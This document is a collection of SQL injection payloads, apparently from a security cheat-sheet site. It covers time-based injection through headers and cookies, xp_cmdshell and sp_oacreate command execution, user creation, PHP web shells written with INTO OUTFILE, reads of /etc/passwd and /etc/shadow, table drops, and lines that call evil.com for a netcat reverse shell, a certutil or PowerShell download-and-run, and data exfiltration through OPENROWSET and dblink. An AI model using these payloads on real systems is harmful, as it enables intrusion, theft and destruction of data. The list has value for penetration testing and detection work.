# Time-based injection with HTTP parameter pollution
id=1' AND SLEEP(5) &id=2' AND SLEEP(5)--
username=admin' AND SLEEP(5) &username=test' AND SLEEP(5)--
password=' AND SLEEP(5) &password=' AND SLEEP(10)--
# Cookie-based time injection
Cookie: sessionid=' AND SLEEP(5)--
Cookie: user_id=' OR pg_sleep(5)--
Cookie: auth=' WAITFOR DELAY '00:00:05'--
# User-Agent time injection
User-Agent: ' AND SLEEP(5)--
User-Agent: ' OR pg_sleep(5)--
User-Agent: ' WAITFOR DELAY '00:00:05'--
# Referer time injection
Referer: ' AND SLEEP(5)--
Referer: ' OR pg_sleep(10)--
Referer: ' WAITFOR DELAY '00:00:05'--
# X-Forwarded-For time injection
X-Forwarded-For: ' AND SLEEP(5)--
X-Forwarded-For: ' OR pg_sleep(5)--
X-Forwarded-For: ' WAITFOR DELAY '00:00:05'--
# Error-based time delays (combining error and time)
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), SLEEP(5)) x FROM information_schema.tables GROUP BY x) a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(database(), SLEEP(5)) x FROM users GROUP BY x) a)--📝 SQL-инъекции хранимых процедур sql
🔴 complex
⭐⭐⭐⭐⭐
SQL-инъекции через хранимые процедуры - xp_cmdshell, sp_oacreate, файловые операции и расширенное выполнение команд базы данных
⏱️ 40 min
🏷️ sql, stored procedures, injection, database, advanced
# Stored Procedure SQL Injection Vectors
# SQL injection through stored procedures and database functions
# SQL Server xp_cmdshell injections
' EXEC xp_cmdshell('dir')--
'; EXEC xp_cmdshell('dir')--
' EXEC xp_cmdshell('net user hacker password /add')--
'; EXEC xp_cmdshell('net user hacker password /add')--
' EXEC xp_cmdshell('ping evil.com')--
'; EXEC xp_cmdshell('ping evil.com')--
' EXEC xp_cmdshell('ipconfig')--
'; EXEC xp_cmdshell('whoami')--
# SQL Server master database procedures
' EXEC master..xp_cmdshell 'dir'--
'; EXEC master..xp_cmdshell 'ping evil.com'--
' EXEC master..sp_configure 'show advanced options', 1--
'; EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE;--
' EXEC master..sp_configure 'xp_cmdshell', 1--
'; EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
# SQL Server sp_oacreate injections
' DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir'--
'; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c ping evil.com'--
# SQL Server sp_adduser injections
' EXEC sp_adduser 'hacker', 'password'--
'; EXEC sp_adduser 'admin', 'password123'--
# MySQL stored procedure injections
' CALL shell('dir')--
'; CALL shell('ls -la')--
' DO SLEEP(5)--
'; DO SLEEP(10)--
' EXECUTE immediate 'SLEEP(5)'--
# Oracle stored procedure injections
' EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' EXEC DBMS_LOCK.SLEEP(5)--
'; EXEC DBMS_LOCK.SLEEP(10)--
' EXEC DBMS_SQLHASH.HASH('test')--
'; EXEC DBMS_RANDOM.STRING('a', 10)--
# PostgreSQL stored procedure injections
' SELECT pg_sleep(5)--
'; SELECT pg_sleep(10)--
' EXECUTE 'SELECT pg_sleep(5)'--
'; EXECUTE 'SELECT pg_sleep(10)'--
' SELECT dbms_pipe.receive_message('x', 5)--
# INTO OUTFILE injections (MySQL)
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
'; UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
' UNION SELECT NULL, NULL, NULL INTO OUTFILE '/tmp/test.txt'--
'; SELECT * FROM users INTO OUTFILE '/var/www/html/users.txt'--
# INTO DUMPFILE injections (MySQL)
' UNION SELECT 1,2 INTO DUMPFILE '/var/www/html/test.txt'--
'; UNION SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/var/www/html/info.php'--
# LOAD_FILE injections (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
'; UNION SELECT LOAD_FILE('C:/Windows/win.ini')--
' UNION SELECT LOAD_FILE('/var/www/html/config.php')--
'; SELECT LOAD_FILE('/etc/shadow')--
# BCP utility injections (SQL Server)
' EXEC master..xp_cmdshell 'bcp "SELECT * FROM users" queryout C:\\Users\\Public\\users.txt -c -T'--
'; EXEC master..xp_cmdshell 'bcp database.dbo.users queryout C:\\Users\\Public\\users.txt -c -T'--
# OPENROWSET injections (SQL Server)
' UNION SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', 'C:\\Windows\\system32\\drivers\\etc\\hosts', 'SELECT * FROM hosts')--
# OPENJSON injections (SQL Server 2016+)
' SELECT * FROM OPENJSON((SELECT * FROM users FOR JSON PATH))--
'; SELECT * FROM OPENJSON((SELECT username, password FROM users FOR JSON PATH))--
# EXECUTE with dynamic SQL
' EXEC('SELECT * FROM users')--
'; EXEC('SELECT * FROM admins WHERE username='''admin'''')--
' EXEC('SELECT password FROM users WHERE username=''''admin'''')--
'; EXEC('DROP TABLE users')--
# EXECUTE with user input
'; EXEC('SELECT * FROM users WHERE username=''' + REPLACE(@input, '''', '''''') + '''')--
'; DECLARE @sql NVARCHAR(1000); SET @sql = 'SELECT * FROM users WHERE username=''' + @input + ''''; EXEC(@sql)--
# sp_executesql injections (SQL Server)
' EXEC sp_executesql N'SELECT * FROM users WHERE username = @name', N'@name VARCHAR(100)', @name = 'admin'--
'; EXEC sp_executesql N'SELECT * FROM users'--
' EXEC sp_executesql N'DELETE FROM users WHERE id = @id', N'@id INT', @id = 1--
# MySQL EXECUTE with prepared statements
' SET @sql = CONCAT('SELECT * FROM users WHERE username = ''', @input, ''''); PREPARE stmt FROM @sql; EXECUTE stmt;--
'; SET @sql = 'SELECT * FROM users'; PREPARE stmt FROM @sql; EXECUTE stmt; DEALLOCATE PREPARE stmt;--
# PostgreSQL EXECUTE with dynamic queries
' EXECUTE 'SELECT * FROM users WHERE username = $1' USING 'admin'--
'; EXECUTE 'SELECT * FROM users'--
' DO $$ BEGIN EXECUTE 'SELECT * FROM users WHERE username = ' || quote_literal($1) USING 'admin'; END $$;--
# Oracle EXECUTE IMMEDIATE
' EXECUTE IMMEDIATE 'SELECT * FROM users WHERE username = ''admin'''--
'; EXECUTE IMMEDIATE 'DROP TABLE users'--
' BEGIN EXECUTE IMMEDIATE 'SELECT password FROM users WHERE username = :name' USING 'admin'; END;--
# Database link injections (Oracle)
' UNION SELECT * FROM [email protected]
'; SELECT * FROM users@remote_db--
' INSERT INTO [email protected] VALUES ('hacker', 'password')--
'; DELETE FROM users@remote_db WHERE username='admin'--
# Database link injections (PostgreSQL)
' SELECT * FROM dblink('host=evil.com user=hacker password=secret', 'SELECT * FROM users') AS t1(id INT, username VARCHAR, password VARCHAR)--
'; SELECT * FROM postgres_fdw('SELECT * FROM users')--
# Database link injections (SQL Server)
' SELECT * FROM OPENROWSET('SQLNCLI', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Data Source=evil.com;Integrated Security=SSPI').database.dbo.users--
# Bulk insert injections (SQL Server)
' BULK INSERT users FROM 'C:\\Users\\Public\\users.txt'--
'; BULK INSERT admins FROM 'C:\\Users\\Public\\admins.txt' WITH (FIELDTERMINATOR = ',')--
# SQL injection with IF statements in stored procedures
'; IF EXISTS(SELECT * FROM users WHERE username='admin') DROP TABLE users--
'; IF (SELECT COUNT(*) FROM users) > 0 DROP TABLE users--
'; IF @condition = 'true' BEGIN DROP TABLE users END--
# SQL injection with WHILE loops in stored procedures
'; WHILE EXISTS(SELECT * FROM users) BEGIN DELETE TOP (1) FROM users END--
'; DECLARE @i INT = 1; WHILE @i <= 10 BEGIN INSERT INTO logs (message) VALUES ('test'); SET @i = @i + 1; END--
# SQL injection with CASE statements in stored procedures
'; SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 0 THEN 'true' ELSE 'false' END--
'; UPDATE users SET password = CASE WHEN username = 'admin' THEN 'newpass' ELSE password END--
# SQL injection with CURSOR in stored procedures
'; DECLARE cursor_users CURSOR FOR SELECT username FROM users; OPEN cursor_users; FETCH NEXT FROM cursor_users; CLOSE cursor_users; DEALLOCATE cursor_users;--
# SQL injection with TRANSACTION in stored procedures
'; BEGIN TRANSACTION; DROP TABLE users; COMMIT;--
'; BEGIN TRAN; UPDATE users SET password = 'hacked'; ROLLBACK;--
# SQL injection with TRY/CATCH in stored procedures
'; BEGIN TRY; DROP TABLE users; END TRY; BEGIN CATCH; SELECT ERROR_MESSAGE(); END CATCH;--
# xp_servicecontrol injections (SQL Server)
' EXEC xp_servicecontrol 'start', 'Schedule'--
'; EXEC master..xp_servicecontrol 'start', 'mssearch'--
# xp_regread injections (SQL Server)
' EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum', '0'--
'; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName'--
# xp_replwritetovarbin with payload (SQL Server)
' DECLARE @data VARCHAR(8000); SELECT @data = 0x44005700...; EXEC xp_replwritetovarbin @data--
# sp_makewebtask injections (SQL Server 2000)
' EXEC sp_makewebtask 'C:\\Inetpub\\wwwroot\\shell.php', 'SELECT "<%=Server.CreateObject(""WScript.Shell"").Exec(""cmd.exe /c dir"")%>"'--
'; EXEC sp_makewebtask '\\evil.com\\share\\shell.php', 'SELECT "<?php system($_GET[""cmd""]); ?>"'--
# xp_sendmail injections (SQL Server)
' EXEC xp_sendmail @recipients = '[email protected]', @message = 'Database compromised'--
'; EXEC master..xp_sendmail @recipients = '[email protected]', @subject = 'SQL Injection Success', @message = (SELECT * FROM users FOR XML PATH)--
# MySQL CREATE FUNCTION injections
'; CREATE FUNCTION shell() RETURNS INT SONAME 'lib_mysqludf_sys.so'--
'; CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT do_system('id');--
# MySQL UDF injection
'; CREATE UDF FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';--
'; SELECT do_system('nc -e /bin/sh evil.com 4444');--
# Advanced stored procedure payload execution
'; EXEC master..xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > C:\\Inetpub\\wwwroot\\cmd.php'--
'; EXEC master..xp_cmdshell 'certutil -urlcache -split -f "http://evil.com/shell.exe" C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe'--
'; DECLARE @cmd VARCHAR(1000); SET @cmd = 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://evil.com/payload.ps1'')"'; EXEC master..xp_cmdshell @cmd;--